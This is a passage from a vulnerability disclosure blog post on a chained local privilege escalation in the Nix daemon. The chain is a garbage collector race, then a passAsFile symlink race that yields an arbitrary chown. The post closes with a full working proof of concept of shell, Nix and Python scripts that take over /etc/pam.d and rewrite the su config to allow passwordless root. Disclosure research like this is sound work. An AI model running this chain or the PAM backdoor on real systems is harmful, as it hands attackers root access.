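For contrast, here is a sketch of a recursive delete that would not be redirected by such a swap, because every step uses a name relative to a descriptor it already holds and refuses to follow symbolic links. This illustrates the general technique only. It is not the patch applied by the Nix maintainers, and the names delete_tree_at and demo are made up for the example.

```python
import os
import stat
import tempfile


def delete_tree_at(parent_fd, name):
    """Recursively delete 'name' under parent_fd using only relative names."""
    st = os.stat(name, dir_fd=parent_fd, follow_symlinks=False)
    if stat.S_ISDIR(st.st_mode):
        # O_NOFOLLOW makes the open fail if 'name' became a symlink after the check.
        fd = os.open(name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=parent_fd)
        try:
            for child in os.listdir(fd):
                delete_tree_at(fd, child)
        finally:
            os.close(fd)
        os.rmdir(name, dir_fd=parent_fd)
    else:
        # Symbolic links are unlinked themselves, never followed.
        os.unlink(name, dir_fd=parent_fd)


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "target")
        os.mkdir(target)
        open(os.path.join(target, "keep"), "w").close()
        os.makedirs(os.path.join(tmp, "store", "out", "a"))
        os.symlink(target, os.path.join(tmp, "store", "out", "a", "link"))

        store_fd = os.open(os.path.join(tmp, "store"), os.O_RDONLY | os.O_DIRECTORY)
        try:
            delete_tree_at(store_fd, "out")
        finally:
            os.close(store_fd)
        return (
            os.path.exists(os.path.join(tmp, "store", "out")),
            os.path.exists(os.path.join(target, "keep")),
        )


print(demo())
```

The output directory is removed, but the file behind the symbolic link survives, because the link is unlinked rather than traversed.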

Running our proof of concept, we can see the following output:

$ ls -l /tmp/deleteme
total 0
-rw-r--r-- 1 rory users 0 Apr  3 09:27 a
-rw-r--r-- 1 rory users 0 Apr  3 09:27 b
-rw-r--r-- 1 rory users 0 Apr  3 09:27 c
-rw-r--r-- 1 rory users 0 Apr  3 09:27 d
$ nix-build build.nix
[...]
$ nix-collect-garbage
finding garbage collector roots...
deleting garbage...
deleting '/nix/store/blfpgvrazzjkf2kqzz5h47255s0cdq7g-test00006.drv'
deleting '/nix/store/zqhjzr26ic71nzlzgsi28s6gwgzwg0rd-test00006.lock'
deleting '/nix/store/zqhjzr26ic71nzlzgsi28s6gwgzwg0rd-test00006'
0 store paths deleted, 0.00 MiB freed
error: cannot unlink '"/nix/store/zqhjzr26ic71nzlzgsi28s6gwgzwg0rd-test00006/a"': Directory not empty
$ ls -l /tmp/deleteme
total 0

We can see that nix-collect-garbage errors with ‘Directory not empty’. This is because we changed the directory while it was being processed, so the symbolic links that replaced the directories it had already deleted are still there. This exploitation is slightly unreliable, but it can be cleanly retried, and in the final proof of concept, we simply loop on the exploitation until our target files are deleted.

Looking in our target directory /tmp/deleteme, we can now see that the files we had put in place are no longer there, showing successful exploitation.

Arbitrary directory emptying

Arbitrary file deletion is one of my least favourite vulnerabilities, as it is often hard to turn into something actually interesting. In this case, what we have found is even worse: we can only empty a directory, not delete the directory itself, making this a very blunt instrument.

You can rest assured, dear reader, that there is a way to turn this vulnerability into something fun; otherwise, this blog post would not exist.

Finding a target

Our options are quite limited for targeting such a vulnerability. We don’t want to break the system entirely, as root command execution is meaningless if you’ve wiped out everything of value. This excludes most system files like /etc, /dev, /lib, etc. The natural answer is /tmp, or equivalent. The sticky bit on /tmp means we can’t interfere with files and directories that we didn’t create; however, if they’re deleted using our exploit, we can recreate them, since /tmp is world writable.
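The sticky bit mentioned here is the S_ISVTX flag in a directory's mode, the same flag that shows up in the strace output for /tmp. A small sketch for checking it from Python follows; the helper name has_sticky_bit is made up for illustration.

```python
import os
import stat
import tempfile


def has_sticky_bit(path):
    """True if the sticky bit (S_ISVTX) is set on path."""
    return bool(os.stat(path).st_mode & stat.S_ISVTX)


# Demonstrate on a scratch directory rather than assuming anything about /tmp.
with tempfile.TemporaryDirectory() as scratch:
    os.chmod(scratch, 0o1777)  # world-writable with the sticky bit, like a typical /tmp
    print(has_sticky_bit(scratch))
    os.chmod(scratch, 0o700)   # restore owner-only permissions before cleanup
```

With the bit set, only the owner of an entry (or of the directory, or root) may rename or delete it, which is why emptying the directory as root and then recreating entries ourselves matters.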

Turning once again to strace, examining a build (with some extra flags turned on, we’ll see that soon), we find a few potentially interesting leads in the sandbox creation code:

newfstatat(AT_FDCWD</>, "/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
mkdir("/tmp/nix-build-demo.drv-0", 0700) = 0
mkdir("/tmp/nix-build-demo.drv-0/build", 0700) = 0
chown("/tmp/nix-build-demo.drv-0/build", 30001, 30000) = 0
openat(AT_FDCWD</>, "/tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 19</tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo>
write(19</tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo>, "test", 4) = 4
close(19</tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo>) = 0
chown("/tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo", 30001, 30000) = 0
newfstatat(AT_FDCWD</>, "/tmp/nix-build-demo.drv-0/build", {st_mode=S_IFDIR|0700, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
mount("/tmp/nix-build-demo.drv-0/build", "/nix/store/[hash]-demo.drv.chroot/root/build", 0x7fc183a87e5e, MS_BIND|MS_REC, NULL) = 0

The /tmp/nix-build-demo.drv-0 directory is used as the current working directory during a build, and can be left behind in the case of a failed build to assist with debugging. As such, it’s created in an accessible location: under /tmp. UID 30001 is the UID for the nixbld1 user, the user we will later execute code as inside the build sandbox, with the build directory acting as the current working directory.

The .attr-[hash]-demo file comes from some new functionality we added to our build.nix:

  my_env = "test";
  passAsFile = ["my_env"];

Arguments in the build.nix which aren’t otherwise keywords will be passed to the build process as environment variables. When the passAsFile keyword specifies some of these environment variables by name, they are instead passed as files into the sandbox. This is particularly useful when you want to pass data to the process that will not fit inside an environment variable due to operating system size restrictions.
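To make this concrete from the builder’s point of view: for an attribute listed in passAsFile, Nix sets an environment variable named after the attribute with a Path suffix (my_envPath for the example above) that points at the file. The helper below is a hypothetical sketch of how a builder could read either kind of attribute; read_build_attr and the fake environment are my own names, not part of Nix.

```python
import os
import tempfile


def read_build_attr(name: str, env: dict) -> str:
    """Return a derivation attribute as the builder sees it.

    Attributes listed in passAsFile arrive as a file whose location is stored
    in <name>Path; everything else arrives directly as an environment variable.
    """
    path = env.get(name + "Path")
    if path is not None:
        with open(path) as f:
            return f.read()
    return env[name]


# Simulate the two cases with a scratch file standing in for the .attr-... file.
with tempfile.NamedTemporaryFile("w", prefix=".attr-", delete=False) as f:
    f.write("test")

fake_env = {"my_envPath": f.name, "other": "plain value"}  # hypothetical builder environment
print(read_build_attr("my_env", fake_env))
print(read_build_attr("other", fake_env))
```

Inside a real build you would pass os.environ instead of fake_env.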

There are 3 vulnerabilities here (test yourself!), of which only one is practically exploitable (all were reported and fixed anyway). Whilst /tmp/nix-build-demo.drv-0 is root-owned, with permissions 0700, meaning we cannot normally interfere with it, we are assuming that we have used our previous exploit to delete everything inside /tmp, and we can therefore recreate any directory structures we see ourselves.

The first vulnerability is the first chown of /tmp/nix-build-demo.drv-0/build. Whilst chown will follow symbolic links, and the build directory is not directly inside /tmp so the sticky bit does not take effect, this syscall happens immediately after the mkdir for this directory, meaning there isn’t enough time to delete the directory using our (relatively slow) exploit above and recreate it by the time the chown happens. (If the nix-build-demo.drv-0 directory exists before we get to this code, the daemon will use nix-build-demo.drv-1 (etc) instead).
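The numbered-suffix behaviour mentioned in the parenthetical can be pictured with a short sketch. This is not the daemon’s actual code, only an illustration of the observable behaviour under the assumption that it tries suffixes in increasing order; create_build_dir is a hypothetical name.

```python
import os
import tempfile


def create_build_dir(parent: str, drv_name: str) -> str:
    """Create <parent>/nix-build-<drv_name>-<n> using the lowest free n."""
    counter = 0
    while True:
        candidate = os.path.join(parent, f"nix-build-{drv_name}-{counter}")
        try:
            # mkdir fails if the name exists, so an existing directory is never reused.
            os.mkdir(candidate, 0o700)
            return candidate
        except FileExistsError:
            counter += 1


parent = tempfile.mkdtemp()  # stands in for /tmp
first = create_build_dir(parent, "demo.drv")
second = create_build_dir(parent, "demo.drv")
print(os.path.basename(first), os.path.basename(second))
```

This is why pre-creating the directory ourselves does not help: the name has to be freed and recreated after the daemon has already committed to it.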

The third vulnerability, also not exploitable, is the call to mount on the last line. mount will follow symbolic links in its source (the first) argument. This could potentially have allowed us to mount arbitrary directories inside the build sandbox. This could have been interesting as it may have allowed us to gain more write access over /nix/store than is normally possible. However, once again, the window is too narrow. It would be necessary to replace the source directory between the immediately preceding call to newfstatat and the mount, which is too tight of a window. If the call to newfstatat sees that the source path is a symbolic link, it will recreate the symbolic link inside the sandbox rather than calling mount, making the exploit fail.

The second vulnerability is our winner: the chown of the file /tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo to UID 30001 (nixbld1). While this call happens almost immediately after the call to openat, which creates the file, the write in between is crucial, as we control the content that gets written. In this case it’s just the string ‘test’, but if we write enough content (say, 100MB) to this file, it should give us plenty of time to replace the file with a symbolic link while the write happens, such that by the time the process gets to the call to chown, it will affect some other file we’ve targeted.

A look at timing

To look at the timing for just this section, we pass a 100MB string as a parameter (to be written to the file) with

  passAsFile = ["passme"];
  passme = pkgs.lib.concatMapStrings (_: "A") (pkgs.lib.range 1 100000000);

We get

10:39:10.197451 mkdir("/tmp/nix-build-test00005.drv-0", 0700) = 0
10:39:10.197553 mkdir("/tmp/nix-build-test00005.drv-0/build", 0700) = 0
10:39:10.197617 chown("/tmp/nix-build-test00005.drv-0/build", 30001, 30000) = 0
10:39:10.202695 mmap(NULL, 100003840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc15e0a1000
10:39:34.911220 openat(AT_FDCWD</>, "/tmp/nix-build-test00005.drv-0/build/.attr-[hash]", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 5014</tmp/nix-build-tes
10:39:34.911418 write(5014</tmp/nix-build-test00005.drv-0/build/.attr-[hash]>, "AAA…", 100000000) = 100000000
10:39:34.944649 close(5014</tmp/nix-build-test00005.drv-0/build/.attr-[hash]>) = 0
10:39:34.944790 munmap(0x7fc15e0a1000, 100003840) = 0
10:39:34.947171 chown("/tmp/nix-build-test00005.drv-0/build/.attr-[hash]", 30001, 30000) = 0

We can see that the directory is created in /tmp, followed by a large mmap to hold the large variable data. Between the mmap and the openat, there is a 24-second window. This window is perfect for us to use our previous exploit to empty /tmp. We can then recreate /tmp/nix-build-test00005.drv-0/build before the call to openat. Once we control the build directory, we can watch it for the creation of the .attr-... file, and use the 0.036-second window between the call to openat and the call to chown to replace the file (as it’s being written to) with a symbolic link.
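For anyone who wants to check the arithmetic, the two windows can be recomputed from the timestamps in the trace. This is just a convenience sketch; seconds_between is a hypothetical helper name.

```python
from datetime import datetime


def seconds_between(start: str, end: str) -> float:
    """Difference between two strace-style HH:MM:SS.microseconds timestamps."""
    fmt = "%H:%M:%S.%f"
    return (datetime.strptime(end, fmt) - datetime.strptime(start, fmt)).total_seconds()


# Timestamps copied from the strace output above.
MMAP = "10:39:10.202695"
OPENAT = "10:39:34.911220"
CHOWN = "10:39:34.947171"

empty_tmp_window = seconds_between(MMAP, OPENAT)      # time available to empty /tmp
symlink_swap_window = seconds_between(OPENAT, CHOWN)  # time available to swap in the symbolic link

print(f"{empty_tmp_window:.6f}s, {symlink_swap_window:.6f}s")
```

The first window is a little under 25 seconds and the second is roughly 36 milliseconds, which is tight but comfortably within reach of a busy loop watching the directory.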

By the time we get to the chown, the file being chowned points to anything we would like to target, which then gets chowned to UID 30001 aka nixbld1, which we can control. The chown is performed by the nix daemon as root, outside the build sandbox, so we can essentially target anything.
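The underlying problem is that a path is resolved afresh every time it is used, while an open file descriptor keeps pointing at the file that was actually created. The sketch below shows this without needing root by comparing inode numbers instead of calling chown; all file names in it are stand-ins of my own, and both "sides" run in one process purely for illustration.

```python
import os
import tempfile

workdir = tempfile.mkdtemp()
target = os.path.join(workdir, "TARGET")         # stands in for the victim file
attr_path = os.path.join(workdir, ".attr-demo")  # stands in for the passAsFile file

open(target, "w").close()

# "Daemon" side: create the file and keep the descriptor open while writing.
fd = os.open(attr_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o666)
os.write(fd, b"test")

# "Attacker" side: swap the name for a symbolic link before the path is used again.
os.unlink(attr_path)
os.symlink(target, attr_path)

path_inode = os.stat(attr_path).st_ino  # follows the link, just as chown(path, ...) would
fd_inode = os.fstat(fd).st_ino          # still the file that was originally created
target_inode = os.stat(target).st_ino
os.close(fd)

print("path resolves to target:", path_inode == target_inode)
print("descriptor resolves to target:", fd_inode == target_inode)
```

Any operation performed by path after the swap lands on the target, whereas an operation performed on the descriptor cannot be redirected.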

Cheating validation

Since we’re working on a research machine here, we can cheat a little to validate this step without needing to build the whole proof of concept around it. Logging in as root, we can use a quick shell script to prove out our idea:

touch /TEST
ls -l /TEST
echo "waiting for dir"
until [ -e /tmp/nix-build-demo.drv-0 ]; do :; done
rm -rf /tmp/nix-build-demo.drv-0
mkdir -p /tmp/nix-build-demo.drv-0/build
echo "waiting for file"
until [ -e /tmp/nix-build-demo.drv-0/build/.attr-[hash] ]; do :; done
ln -sf /TEST /tmp/nix-build-demo.drv-0/build/.attr-[hash]

This script essentially replaces the exploitation of the directory deletion with a targeted rm -rf. Running this script and the following build file concurrently, we see the following output:

let
  pkgs = import <nixpkgs> { };
  passmefilesize = 100000000;
  outputcount = 5000;
in
pkgs.stdenv.mkDerivation {
  name = "demo";
  builder = "/bin/sh";
  args = ["-c" "${pkgs.coreutils}/bin/env"];
  system = builtins.currentSystem;
  passAsFile = ["passme"];
  passme = pkgs.lib.concatMapStrings (_: "A") (pkgs.lib.range 1 passmefilesize);
  outputs = builtins.genList (x: "a"+(toString x)) outputcount; # used to slow down exploitation and improve reliability
}

[nix-shell:/tmp]# sh run.sh
-rw-r--r-- 1 root root 0 Apr  3 10:53 /TEST
waiting for dir
waiting for file

[nix-shell:/tmp]# ls -l /TEST
-rw-r--r-- 1 nixbld1 nixbld 0 Apr  3 10:53 /TEST

Success

Success! We’ve been able to perform an arbitrary chown of a file from root-owned to nixbld1.

Putting it all together in order, we’ve found:

We can control files inside a privileged location (the nix store), after it is expected that they can no longer be changed
Using this persistent access, we’ve found a race condition that lets us exploit the garbage collector to empty arbitrary directories
Using this arbitrary directory emptying, we’ve found a location in a writable directory (/tmp) that unsafely handles files, assuming they’re only root accessible

Exploiting these 3 vulnerabilities in order, we can now change the ownership of arbitrary files or directories in the system to a user we can run arbitrary code as.

The final step is to chown something that will let us escalate our privileges to root. There are many, many ways this can be achieved. In this case, I chose to target /etc/pam.d, a location where authentication configuration files are stored.

Once we have targeted this directory and changed its ownership to nixbld1, it’s necessary to run one final build process. This time, we will use our external cooperating process to pass a file descriptor to /etc/pam.d to the process inside the sandbox. Whilst the nixbld1 user owns this directory, it’s not inside the build sandbox, so the process cannot access it on its own. We can easily pass a reference to the directory into the sandbox so our nixbld1 code can write files as it pleases. (I also found and reported a vulnerability that would let you create a setuid binary for the nixbld1 user, allowing code execution as this user outside the sandbox, but that is a story for another blog post)
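If descriptor passing over Unix sockets is unfamiliar, the following self-contained sketch shows the mechanism in isolation. It is not the proof of concept itself: a socketpair stands in for the abstract Unix socket, a scratch directory stands in for /etc/pam.d, and both ends run in one process. It assumes Python 3.9 or later for socket.send_fds and socket.recv_fds.

```python
import os
import socket
import tempfile

# A connected pair stands in for the abstract Unix socket between the two processes.
outside, inside = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

shared_dir = tempfile.mkdtemp()  # stands in for /etc/pam.d
dir_fd = os.open(shared_dir, os.O_RDONLY | os.O_DIRECTORY)

# Sender: attach the directory descriptor to a one-byte message (SCM_RIGHTS under the hood).
socket.send_fds(outside, [b"A"], [dir_fd])

# Receiver: gets its own descriptor for the same directory without resolving any path.
_, fds, _, _ = socket.recv_fds(inside, 1, 1)
received_fd = fds[0]

# Operations relative to the received descriptor land in the shared directory.
new_fd = os.open("su", os.O_WRONLY | os.O_CREAT, 0o644, dir_fd=received_fd)
os.write(new_fd, b"example\n")
os.close(new_fd)

for handle in (dir_fd, received_fd):
    os.close(handle)
outside.close()
inside.close()

print(os.listdir(shared_dir))
```

The receiver never needs the directory to be visible in its own filesystem view, which is what makes this useful for reaching outside a sandbox.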

We then overwrite the configuration file for su with the following:

account required pam_unix.so
auth required pam_permit.so
session required pam_unix.so

This allows any user to use the su binary to escalate to root with no password required, giving an interactive root shell.

Conclusion

Multi-step vulnerability chains are much harder to identify and build into something meaningful without significant deep research, but protecting against them doesn’t necessarily need to be hard. Careful use of system functionality, such as file deletion and permission changes, where incorrect use can have disastrous effects, can change the category of a block of at-risk code from ‘vulnerable’ to ‘not vulnerable’. Handling everything with validated, relative file descriptors can make exploitation infeasible or impossible, and avoiding the use of world-writable directories, even with the sticky bit, can mean needing many more individual vulnerabilities to successfully exploit a chain, making it that much less likely.

Huge shout out to the NixOS Security Team, who jumped on this vulnerability report, and looped in all of the projects that may have been impacted due to code or architecture reuse (namely Lix and Guix in addition to Nix). The teams implemented effective patches to these vulnerabilities as follows:

For passing file descriptors outside the sandbox, they have implemented the use of pasta networking, which allows for the isolation of network namespaces (and therefore abstract unix sockets) whilst still enabling internet access
For the directory emptying vulnerability, they have ensured that all paths are relative, so the directory file descriptor is not ignored by the call to openat
For the arbitrary chown vulnerability, they have ensured that the .attr-... passAsFile files are only interacted with by file descriptor, using fchown on the file descriptor rather than chown on the path
They also implemented several related and hardening patches, including the issues noted as not practically exploitable above
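The descriptor-based approach described in the list above can be sketched as follows. This is my own minimal illustration of the general pattern, not the code from the actual patches; write_owned_file and the scratch paths are hypothetical names.

```python
import os
import tempfile


def write_owned_file(dir_fd: int, name: str, data: bytes, uid: int, gid: int) -> None:
    """Create `name` inside the directory `dir_fd`, write `data`, and set its owner."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW | os.O_CLOEXEC
    # Relative to dir_fd; O_EXCL refuses any existing name, including a symbolic link.
    fd = os.open(name, flags, 0o600, dir_fd=dir_fd)
    try:
        written = 0
        while written < len(data):  # handle short writes
            written += os.write(fd, data[written:])
        # Acts on the open file itself, whatever the name points at by now.
        os.fchown(fd, uid, gid)
    finally:
        os.close(fd)


build_dir = tempfile.mkdtemp()  # stands in for the build directory
build_fd = os.open(build_dir, os.O_RDONLY | os.O_DIRECTORY)
write_owned_file(build_fd, ".attr-demo", b"test", os.geteuid(), os.getegid())

# A pre-planted symbolic link is refused rather than followed.
os.symlink(os.path.join(build_dir, "elsewhere"), os.path.join(build_dir, ".attr-evil"))
try:
    write_owned_file(build_fd, ".attr-evil", b"test", os.geteuid(), os.getegid())
    refused = False
except FileExistsError:
    refused = True
os.close(build_fd)

print("symlink refused:", refused)
```

The example changes ownership to the current user so that it runs unprivileged; a privileged daemon would pass the build user’s IDs instead.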

For a full accounting of the changes, please see the advisories, linked at the top of this post.

Final proof of concept

The whole proof of concept ends up being relatively short, split across a few files. There are additional minutiae in these scripts to make the exploitation more reliable, which are left as an exercise for the reader.

# privesc.sh
rm -f *.log
mkdir -p tmp
export TMPDIR=$PWD/tmp

TARGET_NAME=test00005 # must match racetarget.nix
PASSASFILE_NAME=passme # must match racetarget.nix

# name of the .attr-<hash> file the daemon creates for the passAsFile attribute
PASSASFILE_FILENAME=.attr-$(nix --extra-experimental-features nix-command eval --expr 'builtins.convertHash { hash = builtins.hashString "sha256" "'${PASSASFILE_NAME}'"; toHashFormat = "nix32"; hashAlgo = "sha256"; }' --raw)
BUILD_DIR=/tmp/nix-build-${TARGET_NAME}.drv-0

# helper that exchanges file descriptors with the builds over abstract unix sockets
python3 server.py &

# start the slow build whose build directory we are going to race
(sleep 2; nix-build racetarget.nix >racetarget.log 2>&1) &

echo waiting for dir creation

# once the build directory exists, retry the directory emptying exploit until it is gone
until [ -e ${BUILD_DIR} ]; do :; done; while [ -e ${BUILD_DIR} ]; do nix-build delracer.nix >delracer.log 2>&1; done

echo waiting for file creation

# recreate the build directory under our control
mkdir -p ${BUILD_DIR}/build
cd ${BUILD_DIR}/build

# swap the passAsFile file for a symbolic link as soon as it appears
until [ -e $PASSASFILE_FILENAME ]; do :; done
ln -sf /etc/pam.d $PASSASFILE_FILENAME

echo "writing pam su"

cd - >/dev/null
echo "waiting for nixbld1"
sleep 10

# rewrite /etc/pam.d/su as nixbld1 from inside a build
nix-build pam.nix >pam.log 2>&1

echo "cleaning up"
rm -rf tmp
nix-collect-garbage >/dev/null 2>&1
touch /tmp/exploit_finished

# su no longer asks for a password: restore ownership and the original config, then drop into a root shell
su -c 'chown root:root /etc/pam.d; mv /etc/pam.d/su.old /etc/pam.d/su; bash'

# racetarget.nix
let
  pkgs = import <nixpkgs> { };
  # both of the following can be decreased to save time, but will also decrease reliability
  # current settings take about 52 seconds on my machine, but are very reliable
  # it's dependent on disk speed. passmefilesize is used for a large (slow) file write, outputcount is for creating a large number of lockfiles
  passmefilesize = 100000000;
  outputcount = 5000;
in
pkgs.stdenv.mkDerivation {
  name = "test00005";
  builder = "/bin/sh";
  args = ["-c" ":"];
  system = builtins.currentSystem;
  passAsFile = ["passme"];
  passme = pkgs.lib.concatMapStrings (_: "A") (pkgs.lib.range 1 passmefilesize);
  outputs = builtins.genList (x: "a"+(toString x)) outputcount;
}

# delracer.nix
let
  pkgs = import <nixpkgs> { };
in
pkgs.stdenv.mkDerivation {
  name = "test00006";
  builder = "/bin/bash";
  args = ["-c" ''
echo $out
TARGET=/tmp
${pkgs.coreutils}/bin/mkdir -p $out/a/b/a{0000..1000}
${pkgs.coreutils}/bin/mkdir -p $out/z.new/b/

for i in {0000..1000}; do
        ${pkgs.coreutils}/bin/ln -s $TARGET $out/z.new/b/a$i
done

${pkgs.coreutils}/bin/chmod 777 $out
${pkgs.python3}/bin/python -c 'import socket,os,array;s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); s.connect(chr(0) +"DELRACER");s.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [os.open(os.environ["out"], os.O_PATH)]))])'
false
''];
  system = builtins.currentSystem;
  outputHash = pkgs.lib.fakeHash;
  outputHashMode = "recursive";
}

# pam.nix
let
  pkgs = import <nixpkgs> { };
in
pkgs.stdenv.mkDerivation {
  name = "test00006";
  builder = "/bin/bash";
  args = ["-c" ''
${pkgs.python3}/bin/python -c 'import socket,os,array;s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); s.connect(chr(0) +"ETCPAMD"); data,ancdata,flags,addr = s.recvmsg(1, socket.CMSG_LEN(4)); fd=int.from_bytes(ancdata[0][2], "little");os.fchdir(fd);os.rename("su", "su.old");open("su", "w").write("account required pam_unix.so\nauth required pam_permit.so\nsession required pam_unix.so")'

false
''];
  system = builtins.currentSystem;
  outputHash = pkgs.lib.fakeHash;
  outputHashMode = "recursive";
}

# server.py
import socket
import os
import array
import time
import signal

# child 1: receives the delracer output directory and swaps its contents mid-deletion
racer_pid = os.fork()
if not racer_pid:
    print("delracer running")
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(chr(0) + "DELRACER")
    s.listen(1)
    while a := s.accept():
        c, _ = a
        data, ancdata, flags, addr = c.recvmsg(1, socket.CMSG_LEN(4))
        received_fd = int.from_bytes(ancdata[0][2], "little")
        os.fchdir(received_fd)

        # busy-wait until deletion of the output has begun (a/b/a0000 disappears)
        while os.path.exists("a/b/a0000"):
            ...
        # swap in the tree of symbolic links that point at the target
        os.rename("a", "a.old")
        os.rename("z.new", "a")

        os.chdir("/")

# child 2: hands a descriptor for /etc/pam.d to the build in pam.nix
pam_pid = os.fork()
if not pam_pid:
    print("pam server running")
    fd = os.open("/etc/pam.d", os.O_DIRECTORY)
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(chr(0) + "ETCPAMD")
    s.listen(1)

    while a := s.accept():
        c, _ = a
        c.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [fd]))])

# parent: wait for privesc.sh to signal completion, then stop both children
while not os.path.exists("/tmp/exploit_finished"):
    time.sleep(1)

os.unlink("/tmp/exploit_finished")
os.kill(racer_pid, signal.SIGTERM)
os.kill(pam_pid, signal.SIGTERM)